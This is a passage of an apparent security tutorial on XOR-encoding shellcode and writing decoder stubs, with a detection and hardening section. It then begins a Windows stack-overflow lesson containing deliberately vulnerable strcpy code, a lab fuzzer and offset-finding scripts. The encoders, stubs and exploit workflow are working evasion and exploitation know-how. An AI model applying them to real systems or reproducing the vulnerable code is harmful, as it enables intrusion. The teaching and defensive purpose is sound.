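    """Return (index, sent, received) at the first divergence, or None if clean."""
    for i, (e, r) in enumerate(zip(expected, received)):
        if e != r:
            return i, hex(e), hex(r)          # index, sent, received
    if len(received) < len(expected):         # copy stopped early
        i = len(received)                     # first byte that never arrived
        return i, hex(expected[i]), "(truncated)"
    return None                               # extra trailing bytes in the dump are ignored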

# expected = bytes(range(0x01, 0x100))        # full pattern minus \x00
# received = open("dump.bin","rb").read()
# print(first_bad(expected, received))

Truncation tells you something extra: the first byte missing from the dump (the one at the index where the copy stopped) is usually the terminator. Note it, exclude it, run again.
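The measure, exclude, repeat loop can be rehearsed offline against a simulated delivery path. `toy_transport` below is hypothetical: it truncates at \x00 the way strcpy would and rewrites \x0a to a space, standing in for the real target.

```python
def build_pattern(excluded: set) -> bytes:
    """All 256 byte values, minus the ones already known to be bad."""
    return bytes(b for b in range(256) if b not in excluded)


def toy_transport(data: bytes) -> bytes:
    """Hypothetical delivery path: stops at \\x00 and turns \\x0a into \\x20."""
    return data.split(b"\x00", 1)[0].replace(b"\x0a", b"\x20")


def enumerate_bad_chars(transport, known=frozenset()) -> set:
    bad = set(known)
    while True:
        sent = build_pattern(bad)
        received = transport(sent)
        for i, expected in enumerate(sent):
            # The first byte that is missing or mangled is the next bad char.
            if i >= len(received) or received[i] != expected:
                bad.add(expected)
                break
        else:
            return bad            # whole pattern survived byte-for-byte


print(sorted(hex(b) for b in enumerate_bad_chars(toy_transport)))   # ['0x0', '0xa']
```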


4. Building an XOR Encoder in Python

The encoder ingests raw shellcode and the confirmed bad-char set, searches for a clean single-byte key, and emits the encoded blob.

#!/usr/bin/env python3
# XOR shellcode encoder — teaching / authorized-lab use only.

# Benign x86 stub: exit(0)  (xor eax,eax; mov al,1; xor ebx,ebx; int 0x80)
shellcode = bytes([0x31, 0xc0, 0xb0, 0x01, 0x31, 0xdb, 0xcd, 0x80])
bad_chars = {0x00, 0x0a, 0x0d}

def find_key(sc, bad):
    for key in range(1, 256):
        if key in bad:
            continue
        if all((b ^ key) not in bad for b in sc):   # no encoded byte is bad
            return key
    return None

key = find_key(shellcode, bad_chars)
if key is None:
    raise SystemExit("[-] No single-byte key is clean. Use per-chunk keying.")

encoded = bytes(b ^ key for b in shellcode)
print(f"[+] key   = {hex(key)}")
print(f"[+] length = {len(encoded)}")
print("[+] blob  = " + "".join(f"\\x{b:02x}" for b in encoded))

If find_key returns None, no single byte can XOR the whole payload clean — you’ve over-constrained the key space. That’s the cue to move to a per-chunk scheme (Section 7), where each chunk gets its own key.


5. The Decoder Stub in x86 (NASM)

The stub runs first on the target, decodes the bytes that follow it, and jumps into them. The hard part is position independence: the stub doesn’t know its own load address, so it can’t hardcode a pointer to the encoded blob. The classic answer is JMP-CALL-POP — a forward jmp short to a call that points backward, so the call pushes the address of the bytes immediately after it. pop that return address and you’ve located your payload at runtime.

section .text
global _start

_start:
    jmp short get_payload      ; (1) hop over the decoder to the CALL

decoder:
    pop  esi                   ; (3) ESI -> first encoded byte
    xor  ecx, ecx
    mov  cl, payload_len       ; loop counter = payload length
decode_loop:
    xor  byte [esi], 0xAA      ; (4) decode one byte, key = 0xAA
    inc  esi                   ; advance
    loop decode_loop           ; ECX--, repeat while non-zero
    jmp  payload               ; (5) run the now-decoded shellcode

get_payload:
    call decoder               ; (2) pushes addr of `payload`, jumps back

payload:
    db   0xcc, 0xcc, 0xcc      ; <-- splice encoder output here
payload_len equ $ - payload

jmp payload assembles to a relative offset, so it stays position-independent without touching ESI. The loop instruction (0xE2) decrements ECX and branches while non-zero.

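Here’s the gotcha that cost me an afternoon once: CL is eight bits. mov cl, payload_len truncates anything over 255 bytes (NASM emits only an overflow warning), so a 300-byte payload decodes only its first 44 bytes (300 mod 256) and then jumps into still-encoded garbage. The crash makes no sense until you check ECX. For longer payloads, zero ECX with xor ecx, ecx and load the 16-bit count with mov cx, payload_len. A full mov ecx, payload_len would embed \x00 bytes in the immediate for any realistic length, and even the 16-bit form needs checking: a length like 0x0100 still contains a zero byte.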
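Patching the count and key into the stub by hand is where the CL limit bites, so it helps to let a script do it and refuse lengths CL can’t hold. A sketch, assuming the 20-byte stub assembled from the listing above (the mov cl immediate sits at offset 6, the XOR key at offset 9); `splice` is a hypothetical helper name.

```python
STUB = bytes.fromhex(
    "eb0d"        # jmp short get_payload
    "5e"          # pop esi
    "31c9"        # xor ecx, ecx
    "b108"        # mov cl, <len>            (immediate at offset 6)
    "8036aa"      # xor byte [esi], <key>    (immediate at offset 9)
    "46"          # inc esi
    "e2fa"        # loop decode_loop
    "eb05"        # jmp payload
    "e8eeffffff"  # call decoder
)
LEN_OFFSET, KEY_OFFSET = 6, 9


def splice(payload: bytes, key: int) -> bytes:
    """Return stub + XOR-encoded payload with the count and key patched in."""
    if not 1 <= len(payload) <= 255:
        raise ValueError("mov cl, imm8 holds 1..255; switch to xor ecx, ecx / mov cx, imm16")
    stub = bytearray(STUB)
    stub[LEN_OFFSET] = len(payload)
    stub[KEY_OFFSET] = key
    return bytes(stub) + bytes(b ^ key for b in payload)


exit0 = bytes([0x31, 0xc0, 0xb0, 0x01, 0x31, 0xdb, 0xcd, 0x80])
print(splice(exit0, 0xAA).hex())
# eb0d5e31c9b1088036aa46e2faeb05e8eeffffff9b6a1aab9b71672a
```

The output still has to pass the bad-char audit in the next section, since the key byte now lives inside the stub.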

Build and extract:

nasm -f elf32 stub.asm -o stub.o
ld   -m elf_i386 stub.o -o stub
objdump -d stub                              # eyeball the opcodes
objcopy -O binary --only-section=.text stub stub.bin
xxd -i stub.bin                              # emit a C array of the bytes

To confirm the assembled stub plus spliced payload actually executes, test it in a throwaway VM — never on your host, never networked:

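/* LAB ONLY: disposable VM, no network.
   gcc -m32 -z execstack -fno-stack-protector test.c -o test */

#include <stdio.h>

int main(void) {
    /* Keep the buffer on the stack: -z execstack makes the stack executable,
       while a global array would land in .data, which is not guaranteed to be. */
    unsigned char buf[] =
        "\xeb\x0d\x5e\x31\xc9\xb1\x08\x80\x36\xaa\x46\xe2\xfa\xeb\x05"
        "\xe8\xee\xff\xff\xff"                /* 20-byte decoder stub, key 0xAA */
        "\x9b\x6a\x1a\xab\x9b\x71\x67\x2a";   /* exit(0) XOR 0xAA (8 bytes)     */
    printf("buffer length: %zu\n", sizeof(buf) - 1);
    fflush(stdout);                           /* exit(0) via int 0x80 skips libc's flush */
    ((void (*)(void))buf)();
    return 0;
}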

[Figure: JMP-CALL-POP flow: forward JMP to a CALL, CALL pushes the payload address, POP into ESI, XOR decode loop, jump into decoded shellcode]
JMP-CALL-POP gives the decoder stub a runtime pointer to the encoded payload without any hardcoded addresses, making it fully position-independent.

6. The Stub Must Be Clean Too

This is the mistake nearly every student makes: they encode the payload until it’s spotless, splice it in, and the exploit still dies — because the decoder stub’s own opcodes contain a bad char. The transport doesn’t care which bytes are “payload” and which are “decoder.” Every byte in the buffer has to survive.

So audit the stub bytes the same way you audit everything else:

#!/usr/bin/env python3
# Flag any decoder-stub byte that collides with the bad-char set.
from capstone import Cs, CS_ARCH_X86, CS_MODE_32

def audit_stub(stub: bytes, bad: set):
    md = Cs(CS_ARCH_X86, CS_MODE_32)
    for ins in md.disasm(stub, 0x0):
        raw = stub[ins.address:ins.address + ins.size]
        hits = [hex(b) for b in raw if b in bad]
        tag = f"   <-- BAD {hits}" if hits else ""
        print(f"{ins.address:04x}  {ins.mnemonic:6} {ins.op_str}{tag}")

When a hit shows up, rewrite the instruction to a semantically equal one with different opcodes. The textbook example: xor eax, eax assembles to \x31\xc0. If \x31 is bad, swap in sub eax, eax (\x29\xc0), which zeroes the register just as well. The same trick rescues xor ecx, ecx (\x31\xc9): sub ecx, ecx is \x29\xc9. Keep a mental table of these substitutions; you’ll lean on it constantly.
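Those substitutions fit in a lookup table. The sketch below lists four two-byte zeroing idioms per register: besides the xor/sub forms above, it includes the alternate opcode encodings (33 /r for XOR, 2B /r for SUB) that express the same operation with the operand direction flipped. The table and helper are illustrative, not from any tool.

```python
# Two-byte "zero this register" encodings, in order of preference.
ZEROING = {
    "eax": [b"\x31\xc0", b"\x33\xc0", b"\x29\xc0", b"\x2b\xc0"],   # xor, xor, sub, sub
    "ecx": [b"\x31\xc9", b"\x33\xc9", b"\x29\xc9", b"\x2b\xc9"],
    "edx": [b"\x31\xd2", b"\x33\xd2", b"\x29\xd2", b"\x2b\xd2"],
    "ebx": [b"\x31\xdb", b"\x33\xdb", b"\x29\xdb", b"\x2b\xdb"],
}


def clean_zeroing(reg: str, bad: set):
    """First zeroing encoding for `reg` that contains no bad byte, or None."""
    for enc in ZEROING[reg]:
        if not bad.intersection(enc):
            return enc
    return None


print(clean_zeroing("eax", {0x00, 0x31}).hex())   # 33c0
```

When every entry fails (for example when the ModRM byte itself is bad), you need a different idiom altogether, such as moving the value through another register.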


7. Per-Chunk Keyed Encoding

When the bad-char set is large enough that no single key clears the whole payload, split the work. Break the shellcode into N-byte chunks; for each chunk, search for a byte that XORs that chunk clean, then prepend the chosen key byte to the chunk. The decoder reads the key, applies it to the following N bytes, advances, and repeats.

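; Per-chunk keyed decoder. Layout: [key][d0][d1] [key][d0][d1] ... [marker]
; Assumes ESI -> first key byte (e.g. from JMP-CALL-POP) and payload_start
; labels that same byte. Decoded bytes are compacted through EDI so the key
; bytes don't end up interleaved with the shellcode.
    mov   edi, esi             ; write pointer trails the read pointer
    cld                        ; LODSB/STOSB move forward
decode_chunk:
    lodsb                      ; AL = key for this chunk, ESI++
    mov   ah, al               ; AH = key
    lodsb                      ; AL = encoded data byte 0
    xor   al, ah
    stosb                      ; store decoded byte 0, EDI++
    lodsb                      ; AL = encoded data byte 1
    xor   al, ah
    stosb                      ; store decoded byte 1
    cmp   byte [esi], 0x90     ; end-marker (raw, unencoded NOP)?
    jne   decode_chunk
    jmp   payload_start        ; compacted, decoded shellcode starts here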

Scheme             | Pro                                   | Con
------------------ | ------------------------------------- | ---
Fixed single key   | Smallest stub; one xor per byte       | Fails when bad-char set is dense
Per-chunk key      | Survives tight bad-char sets          | Larger blob (one key byte per chunk); bigger stub

The end-marker matters here: a fixed length is brittle, so a sentinel lets the decoder run until it sees the marker instead of carrying a hardcoded count. Pick a marker value that can’t appear as a chunk key (the simplest guarantee is to exclude it from the encoder’s key search) or you’ll halt early. If you can’t afford to drop 0x90 from the key space, use a distinctive two-byte sentinel instead.
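The encoder side of that scheme, sketched in Python under a few assumptions: 2-byte chunks, the raw 0x90 end marker, NOP padding for a short final chunk, and a decoder that compacts its output so the key bytes don’t end up inside the shellcode. `decode_chunks` is only a Python model of that loop, used to check the round trip.

```python
MARKER = 0x90          # end-of-blob sentinel, checked at key positions only


def encode_chunks(sc: bytes, bad: set, n: int = 2, marker: int = MARKER) -> bytes:
    """[key][n encoded bytes]... [marker], with a fresh clean key per chunk."""
    if marker in bad:
        raise ValueError("the marker itself is a bad character")
    if len(sc) % n:
        sc += b"\x90" * (n - len(sc) % n)          # pad the last chunk with NOPs
    out = bytearray()
    for i in range(0, len(sc), n):
        chunk = sc[i:i + n]
        for key in range(1, 256):
            if key in bad or key == marker:        # key is emitted raw; must not read as the marker
                continue
            enc = bytes(b ^ key for b in chunk)
            if not bad.intersection(enc):
                out.append(key)
                out += enc
                break
        else:
            raise ValueError(f"no clean key for chunk at offset {i}")
    out.append(marker)
    return bytes(out)


def decode_chunks(blob: bytes, n: int = 2, marker: int = MARKER) -> bytes:
    """Python model of the compacting decoder loop."""
    out, i = bytearray(), 0
    while blob[i] != marker:
        key = blob[i]
        out += bytes(b ^ key for b in blob[i + 1:i + 1 + n])
        i += 1 + n
    return bytes(out)


exit0 = bytes([0x31, 0xc0, 0xb0, 0x01, 0x31, 0xdb, 0xcd, 0x80])
blob = encode_chunks(exit0, {0x00, 0x0a, 0x0d})
print(blob.hex())                           # 0130c102b2030130da01cc8190
```

Key 0x01 works for three of the four chunks; the (0xb0, 0x01) chunk would produce \x00 under it, so that chunk gets 0x02 instead.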


8. Stack-Based Decoding

In-place decoding writes over the encoded blob where it sits. Sometimes you’d rather leave the original untouched and decode into fresh stack space — useful when the landing buffer is read-only or you want the executable copy somewhere predictable.

decoder:
    pop   esi                  ; ESI -> encoded payload
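    xor   ecx, ecx             ; build 0x200 in ECX without a \x00 byte
    mov   ch, 0x02             ; ECX = 0x00000200
    sub   esp, ecx             ; reserve 512 bytes of scratch (sub esp, 0x200 would embed nulls)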
    mov   edi, esp             ; EDI -> destination buffer
    xor   edx, edx             ; offset = 0
copy_decode:
    mov   al, [esi + edx]      ; fetch encoded byte
    cmp   al, 0xcc             ; raw end-marker?
    je    run
    xor   al, 0xaa             ; decode with key
    mov   [edi + edx], al      ; write to stack
    inc   edx
    jmp   copy_decode
run:
    jmp   edi                  ; execute decoded shellcode on the stack

EDX tracks the running offset into both source and destination; the marker is checked before decoding so it stays a literal sentinel. The catch: sub esp must reserve enough room, and the marker can’t collide with an encoded byte. This pattern is also the one DEP/NX and Arbitrary Code Guard hit hardest — you’re executing freshly written stack memory, which is exactly what those mitigations exist to stop (Section 10).
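Both catches can be enforced on the encoder side before anything is sent. A sketch assuming the 0x200-byte scratch area, key 0xAA, and raw 0xCC marker from the listing above; `decode_from_stack` models the copy_decode loop for a round-trip check, and both function names are hypothetical.

```python
SCRATCH = 0x200        # bytes reserved by the stub
END_MARKER = 0xCC      # raw sentinel the stub checks before decoding


def encode_for_stack(sc: bytes, key: int, marker: int = END_MARKER,
                     capacity: int = SCRATCH) -> bytes:
    """XOR-encode for the copy-to-stack decoder and append the raw end marker."""
    if len(sc) > capacity:
        raise ValueError(f"{len(sc)} bytes won't fit in {capacity:#x} bytes of scratch")
    enc = bytes(b ^ key for b in sc)
    if marker in enc:
        pos = enc.index(marker)
        raise ValueError(f"encoded byte at offset {pos} equals the end marker; pick another key")
    return enc + bytes([marker])


def decode_from_stack(blob: bytes, key: int, marker: int = END_MARKER) -> bytes:
    """Model of copy_decode: stop at the raw marker, XOR everything before it."""
    return bytes(b ^ key for b in blob[:blob.index(marker)])


exit0 = bytes([0x31, 0xc0, 0xb0, 0x01, 0x31, 0xdb, 0xcd, 0x80])
print(encode_for_stack(exit0, 0xAA).hex())   # 9b6a1aab9b71672acc
```

With key 0xAA, any payload byte 0x66 would encode to the 0xCC marker and stop the decoder early, which is exactly the collision the check rejects.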


9. shikata_ga_nai: the State of the Art

The single-byte XOR loop is trivially signatured — that tight xor / inc / loop sequence is a detection rule. Metasploit’s shikata_ga_nai answers with a polymorphic XOR additive feedback encoder. Two ideas carry it:

  • Chained, self-modifying key. Each decoded byte feeds into the key used for the next. Get one byte or the initial key wrong and the whole tail decodes to noise — which also frustrates partial emulation.
  • Metamorphic stub generation. The decoder is rebuilt with reordered and substituted instructions every time, so two payloads from the same source share no static signature. Its GetPC routine is deliberately obfuscated: it executes an FPU instruction and then uses fnstenv [esp-0xc] to recover EIP without a tell-tale CALL, a deliberate jab at emulators that don't model the FPU.
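The chained-key idea is easier to see in a toy than in shikata_ga_nai itself. The sketch below is a deliberately simplified byte-wise scheme, an assumption for illustration rather than shikata's actual DWORD-based algorithm or stub: each plaintext byte is XORed with the running key and then added into it, so the decoder can only reproduce the key schedule if every earlier byte decoded correctly.

```python
def feedback_encode(data: bytes, key: int) -> bytes:
    """Toy scheme: c_i = p_i XOR k_i, then k_{i+1} = (k_i + p_i) mod 256."""
    out = bytearray()
    for p in data:
        out.append(p ^ key)
        key = (key + p) & 0xFF      # feed the plaintext byte back into the key
    return bytes(out)


def feedback_decode(data: bytes, key: int) -> bytes:
    """Inverse: recover p_i, then rebuild the same key schedule from it."""
    out = bytearray()
    for c in data:
        p = c ^ key
        out.append(p)
        key = (key + p) & 0xFF
    return bytes(out)


msg = b"chained key demo"
enc = feedback_encode(msg, 0x5A)
assert feedback_decode(enc, 0x5A) == msg

# Flip one bit in the first encoded byte: the key schedule diverges from byte 1 onward
bad = bytes([enc[0] ^ 0x01]) + enc[1:]
print(feedback_decode(bad, 0x5A))
```

The corrupted run decodes byte 0 wrong (by one bit) and byte 1 wrong with certainty, because the key for byte 1 is derived from the wrong byte 0; later bytes almost always stay wrong as the error propagates.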

You don’t need to build one to defend against it. The lesson for blue teams is the opposite: stop chasing the encoded bytes and watch the behavior, because the bytes are designed to be different every time and the behavior isn’t.


10. Detection and Defense: What the Blue Team Sees

The encoded payload is, by construction, a poor signature target. The decoder’s behavior is not. Two heuristics catch nearly every variant: self-modifying memory (a region writes to itself, then executes), and execution from writable memory (RWX stack/heap pages, VirtualAlloc(PAGE_EXECUTE_READWRITE)).

Behavior                                  What it reveals
Tight xor/inc/loop over a code region     Classic fixed-key decoder stub
Region transitions writable → executable  Decoded payload about to run
Execution from unbacked memory            Code with no file on disk behind it
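A minimal triage sketch of the two heuristics, assuming you already have region records (base, protection, type), for example from a VirtualQueryEx walk or a memory scanner's export. The PAGE_* and MEM_* values are the documented winnt.h constants; the Region record and flag_region function are hypothetical.

```python
from dataclasses import dataclass

# Documented winnt.h protection and region-type constants
PAGE_EXECUTE = 0x10
PAGE_EXECUTE_READ = 0x20
PAGE_EXECUTE_READWRITE = 0x40
PAGE_EXECUTE_WRITECOPY = 0x80
MEM_IMAGE = 0x1000000      # backed by an image file on disk
MEM_MAPPED = 0x40000       # backed by a mapped section
MEM_PRIVATE = 0x20000      # private allocation (e.g. VirtualAlloc), no file behind it

EXECUTE_MASK = PAGE_EXECUTE | PAGE_EXECUTE_READ | PAGE_EXECUTE_READWRITE | PAGE_EXECUTE_WRITECOPY


@dataclass
class Region:              # hypothetical record, e.g. one VirtualQueryEx result
    base: int
    protect: int
    mem_type: int


def flag_region(r: Region) -> list:
    """Return the heuristics a committed region trips: 'RWX' and/or 'unbacked-exec'."""
    findings = []
    prot = r.protect & 0xFF            # drop modifier bits such as PAGE_GUARD (0x100)
    if prot == PAGE_EXECUTE_READWRITE:
        findings.append("RWX")
    if prot & EXECUTE_MASK and r.mem_type != MEM_IMAGE:
        findings.append("unbacked-exec")
    return findings


print(flag_region(Region(0x1A0000, PAGE_EXECUTE_READWRITE, MEM_PRIVATE)))  # ['RWX', 'unbacked-exec']
```

Real scanners such as pe-sieve and Moneta go further (comparing image pages against the file on disk, inspecting thread start addresses), so treat this as the first filter, not the whole check.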

Sysmon Event IDs

Event ID  Name                Relevance
1         Process Creation    Loader/injector process spawn
7         Image Loaded        DLLs from temp/download paths into system processes
8         CreateRemoteThread  Thread created in another process (low-volume, high-signal)
10        ProcessAccess       Cross-process memory access; inspect GrantedAccess and CallTrace
25        ProcessTampering    In-memory image diverges from disk (hollowing / in-memory decode)

Configuration is where visibility quietly dies. The SwiftOnSecurity sysmon-config excludes kernel32.dll as a StartModule, which silently suppresses Event ID 8 for injections that go through LoadLibraryW. Remove that StartModule exclusion to restore coverage.

Sigma Rule

title: Shellcode Injection via Suspicious Cross-Process Access
logsource:
  product: windows
  category: process_access
detection:
  selection:
    GrantedAccess:
      - '0x147a'
      - '0x1f3fff'
    CallTrace|contains: 'UNKNOWN'
  condition: selection
level: high
tags:
  - attack.t1055

A CallTrace of UNKNOWN means the access originated from unbacked memory — no module owns those instructions, which is exactly the fingerprint a decoded payload leaves.
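The rule's selection is an AND across fields and an OR within the GrantedAccess list. This Python sketch mirrors that logic against Sysmon Event ID 10 records represented as dicts; the dict shape and the sample CallTrace string are illustrative assumptions, since real pipelines normalize field names differently.

```python
SUSPICIOUS_ACCESS = {"0x147a", "0x1f3fff"}


def matches_rule(event: dict) -> bool:
    """Mirror the Sigma selection: GrantedAccess is one of the listed masks
    AND CallTrace contains UNKNOWN. Sigma string matching is case-insensitive
    by default, so both comparisons are lowercased."""
    granted = str(event.get("GrantedAccess", "")).lower()
    call_trace = str(event.get("CallTrace", "")).lower()
    return granted in SUSPICIOUS_ACCESS and "unknown" in call_trace


event = {
    "GrantedAccess": "0x1F3FFF",
    "CallTrace": "C:\\Windows\\SYSTEM32\\ntdll.dll+9d204|UNKNOWN(00000000004A0000)",
}
print(matches_rule(event))   # True
```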

ETW providers

Provider                               Purpose
Microsoft-Windows-Threat-Intelligence  Kernel-level VirtualAlloc/VirtualProtect/WriteProcessMemory/CreateRemoteThread; consumed by PPL EDRs
Microsoft-Windows-Security-Auditing    Event ID 4688 process creation with command line
AMSI                                   Inspects script content after deobfuscation, before execution

Hardening

  • bcdedit /set nx AlwaysOn — system-wide DEP/NX blocks execution of decoded stack/heap output.
  • Arbitrary Code Guard (ACG) via ProcessDynamicCodePolicy — forbids self-modifying and dynamically generated code, which directly kills in-place XOR decode.
  • Code Integrity Guard (CIG) via ProcessSignaturePolicy: restricts image loads to Microsoft-signed binaries.
  • Watch for AmsiScanBuffer patching, the standard AMSI bypass; pair AMSI with constrained language mode and allowlisting.
  • Scan for RWX and unbacked regions with pe-sieve, Moneta, or Hunt-Sleeping-Beacons — the residue a decoded payload leaves behind.

Figure: Defenders shift focus from ever-changing encoded bytes to stable behavioral signals; self-modifying memory and unbacked execution are the constants that encoding cannot hide.

11. Tools

Tool               Description                                    Link
NASM               Assemble x86/x64 decoder stubs                 nasm.us
GDB + pwndbg       Single-step the decode loop, inspect ESI/ECX   gdb.gnu.org
objdump / objcopy  Disassemble stubs, extract .text bytes         gnu.org
Capstone           Programmatic opcode audit for bad chars        capstone-engine.org
pwntools           Encoder/exploit automation (pwnlib.encoders)   docs.pwntools.com
pe-sieve / Moneta  Scan live processes for RWX / unbacked memory  github.com
Sysmon             Endpoint telemetry for Event IDs 8, 10, 25     learn.microsoft.com

12. MITRE ATT&CK Mapping

Technique                                MITRE ID   Detection
Obfuscated Files or Information          T1027      Entropy/structure anomalies; encoded blob with decoder prefix
Encrypted/Encoded File                   T1027.013  Static scan for XOR-loop stub patterns near high-entropy data
Deobfuscate/Decode Files or Information  T1140      Self-modifying memory; ACG violations; ETW VirtualProtect
Process Injection                        T1055      Sysmon 8/10; Sigma on GrantedAccess + CallTrace: UNKNOWN
PE Injection                             T1055.002  Shellcode written into another process; RWX region creation
Reflective Code Loading                  T1620      Execution from unbacked memory; pe-sieve / Moneta

Summary

  • XOR encoding survives bad-char-hostile delivery paths because XOR is self-inverse — encode once, decode at runtime with the same key.
  • The decoder stub uses JMP-CALL-POP to find itself in memory, then loops xor byte [esi], key over the encoded payload and jumps in; a CL loop counter silently caps you at 255 bytes.
  • The stub’s own opcodes must be bad-char-clean too — audit them with Capstone and substitute equivalent instructions (sub eax,eax for xor eax,eax).
  • Per-chunk keys and stack-based decode handle dense bad-char sets and read-only buffers; shikata_ga_nai adds polymorphism so the encoded bytes never signature the same way twice.
  • Defenders ignore the shifting bytes and hunt the behavior — self-modifying RWX memory, CallTrace: UNKNOWN on Sysmon Event ID 10, and ACG/DEP violations on execution.


Classic Stack Buffer Overflow: Smashing the Stack on Windows

Objective: Understand how a classic stack-based buffer overflow corrupts a Windows x86 call frame, hijacks the saved EIP, and redirects execution through a JMP ESP trampoline — and how /GS, SafeSEH, SEHOP, DEP, and ASLR defeat or complicate it, so you can detect and defend against this vulnerability class in authorized lab work.


1. Windows Memory Layout Primer

Every Windows process runs inside a private virtual address space. On x86 (32-bit), user mode spans 0x00000000 to 0x7FFFFFFF by default. The stack grows downward (high to low addresses) and stores function call frames; the heap grows upward and serves dynamic allocations.

The CPU tracks two stack-relevant registers and one execution register:

  • ESP — stack pointer, the current top of stack.
  • EBP — base/frame pointer, anchors the current frame.
  • EIP — instruction pointer, the address of the next instruction. This is the attacker’s target.

A CALL instruction pushes the return address (the next EIP) onto the stack and jumps to the target. The matching RET pops that saved address back into EIP. If an attacker overwrites the saved return address on the stack, RET transfers control wherever they choose.

x86 is little-endian: the address 0x625011AF is written in the payload as the byte sequence \xAF\x11\x50\x62. This byte ordering matters for every address you place into an exploit buffer.
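Python's struct module performs the same conversion; pwntools' p32, used later in the builder, produces the same bytes under its default little-endian, 32-bit context:

```python
import struct

addr = 0x625011AF
packed = struct.pack("<I", addr)   # "<" = little-endian, "I" = unsigned 32-bit int
print(packed.hex())                # af115062
assert packed == b"\xaf\x11\x50\x62"
assert struct.unpack("<I", packed)[0] == addr
```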


2. Anatomy of a Stack Frame

A standard cdecl/stdcall function frame is built by the prologue and torn down by the epilogue. Laid out high → low address:

Stack Slot                     Description
Function arguments             Pushed by caller before CALL
Saved EIP (return address)     Pushed implicitly by the CALL instruction
Saved EBP                      Pushed by callee prologue (PUSH EBP)
/GS stack cookie (if present)  Inserted between locals and saved EBP/EIP
Local variables / buffers      Allocated by SUB ESP, N
ESP (stack top)                Grows downward

The prologue and epilogue, with the /GS cookie check shown, look like this:

; --- Prologue ---
push    ebp                 ; save caller frame pointer
mov     ebp, esp            ; establish new frame
sub     esp, 0x40           ; allocate 64 bytes of locals
mov     eax, [__security_cookie]
xor     eax, ebp            ; cookie ^= EBP (frame-tied canary)
mov     [ebp-4], eax        ; store cookie above locals

; --- Epilogue ---
mov     ecx, [ebp-4]        ; reload the stored cookie
xor     ecx, ebp            ; undo the EBP mix; ECX should now equal the master cookie
call    __security_check_cookie  ; compare vs master; abort on mismatch
mov     esp, ebp
pop     ebp                 ; restore caller frame pointer
ret                         ; pop saved EIP into instruction pointer

Reading this frame live in WinDbg or x64dbg — inspecting ESP, EBP, and the bytes between locals and the saved return address — is the first skill of exploit development.


Figure: A standard x86 cdecl stack frame (high to low address: arguments, saved return EIP, saved EBP, /GS cookie, local buffer, ESP). The saved return EIP sits just above the saved EBP, making it the prime overwrite target when a local buffer overflows upward.

3. The Overflow: Why Bounds Checks Matter

The root cause is always the same: a copy operation that writes more bytes into a fixed-size stack buffer than the buffer holds. The classic offenders are CRT functions that perform no bounds checking.

Identifier                            What it does
strcpy, strcat, gets, sprintf, scanf  Unsafe CRT functions with no bounds checking; classic root causes
memcpy(dst, src, count)               Copies count bytes regardless of dst size; dangerous when count is attacker-controlled

Here is the canonical vulnerable pattern defenders must recognize in code review:

#include <string.h>

// DELIBERATELY VULNERABLE — lab use only.
void handle_request(char *attacker_input) {
    char buffer[64];            // fixed 64-byte stack buffer
    strcpy(buffer, attacker_input);  // no length check — overflow
}

When attacker_input is 64 bytes or longer (strcpy also writes the terminating NUL), the copy walks past buffer, overwrites the saved EBP, then the saved EIP. Supply a long run of 0x41 ('A') and, when the function returns, the program crashes with an access violation as the CPU tries to execute at EIP = 0x41414141. That controlled crash is proof you own the instruction pointer.
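A minimal Python model of that frame makes the overwrite order concrete. It assumes a /GS- build with no compiler padding between buffer and the saved EBP, which real compilers do not guarantee, so always confirm the real offset in a debugger. The names and the zeroed "original" slot values are illustrative.

```python
import struct

BUF_SIZE = 64                      # char buffer[64]
SAVED_EBP_OFF = BUF_SIZE           # assumes no padding (/GS- build)
SAVED_EIP_OFF = BUF_SIZE + 4


def saved_slots(data: bytes) -> tuple:
    """Simulate strcpy(buffer, data) into the modeled frame.

    Returns the (saved EBP, saved EIP) values afterward. The frame starts
    zeroed, so 0 means "untouched" in this model.
    """
    frame = bytearray(SAVED_EIP_OFF + 4)       # buffer | saved EBP | saved EIP
    src = data + b"\x00"                        # strcpy also copies the NUL terminator
    n = min(len(src), len(frame))               # only model bytes that land in this frame
    frame[:n] = src[:n]                         # no bounds check, like strcpy
    return struct.unpack_from("<II", frame, SAVED_EBP_OFF)


print(hex(saved_slots(b"A" * 72)[1]))           # 0x41414141
```

A 63-byte input stays inside the buffer because the NUL terminator is the 64th byte; at 64 bytes the terminator already lands on the low byte of the saved EBP.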

When compiled with MSVC /GS- (cookie disabled), the prologue omits the xor/store and the epilogue omits __security_check_cookie entirely — a linear overflow reaches the return address unobstructed. Diffing the /GS vs /GS- disassembly in a debugger is the clearest way to see the cookie.


4. Exploit Development Methodology on Windows

The classic workflow is a tight loop against an intentionally vulnerable target in an isolated VM:

  1. Fuzz to crash — send increasing-length inputs until the service faults.
  2. Find the offset — send a cyclic (de Bruijn) pattern, read the value in EIP at crash, compute the exact distance to the return address.
  3. Confirm EIP control — overwrite with a known marker (0x42424242) and verify.
  4. Enumerate bad characters — find bytes the protocol mangles (\x00, \x0a, \x0d are common).
  5. Find a trampoline — locate JMP ESP in a non-ASLR module.
  6. Build the payload — padding + trampoline address + NOP sled + shellcode.

A minimal network fuzzer:

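import socket
import time

target = ("192.168.56.20", 9999)   # isolated lab VM running the vulnerable service
size = 100
last_sent = 0
while size < 4000:
    try:
        with socket.create_connection(target, timeout=5) as s:
            buf = b"TRUN /.:/" + b"A" * size      # protocol prefix + payload
            s.sendall(buf)
        print(f"[+] sent {size} bytes")
        last_sent = size
        size += 200
        time.sleep(1)
    except OSError:
        # Refused/timed-out connection: the previous send most likely crashed the service
        print(f"[!] service unreachable; crash triggered by a ~{last_sent}-{size} byte buffer")
        break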

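Offset discovery with a cyclic pattern. pwntools and mona (!mona pattern_create) generate different patterns, so resolve the EIP value with the same tool that produced the pattern:

from pwn import cyclic, cyclic_find

pattern = cyclic(3000)                 # pwntools de Bruijn sequence (lowercase alphabet, 4-byte windows)
# ... send pattern, read EIP from the debugger at crash ...
eip_at_crash = 0x61616167              # example value only; substitute what the debugger shows
offset = cyclic_find(eip_at_crash)     # exact bytes before saved EIP
print(f"[+] EIP offset = {offset}")
# A value such as 0x6f43396e (mixed case and digits) comes from a Metasploit/mona
# pattern; look it up with !mona findmsp or pattern_offset instead.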
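Under the hood, a cyclic pattern is a de Bruijn sequence: every 4-byte window occurs exactly once, so the four bytes that land in EIP identify a unique offset. This self-contained sketch uses the standard recursive construction over the same lowercase alphabet with window size 4. Its output should match pwntools' default cyclic(), but treat that as an assumption to check against your installed version and prefer the library in practice.

```python
import struct


def de_bruijn(alphabet: bytes, n: int) -> bytes:
    """Standard recursive de Bruijn construction: every n-byte window is unique."""
    k = len(alphabet)
    a = [0] * (k * n)
    seq = []

    def db(t: int, p: int) -> None:
        if t > n:
            if n % p == 0:
                seq.extend(a[1 : p + 1])
        else:
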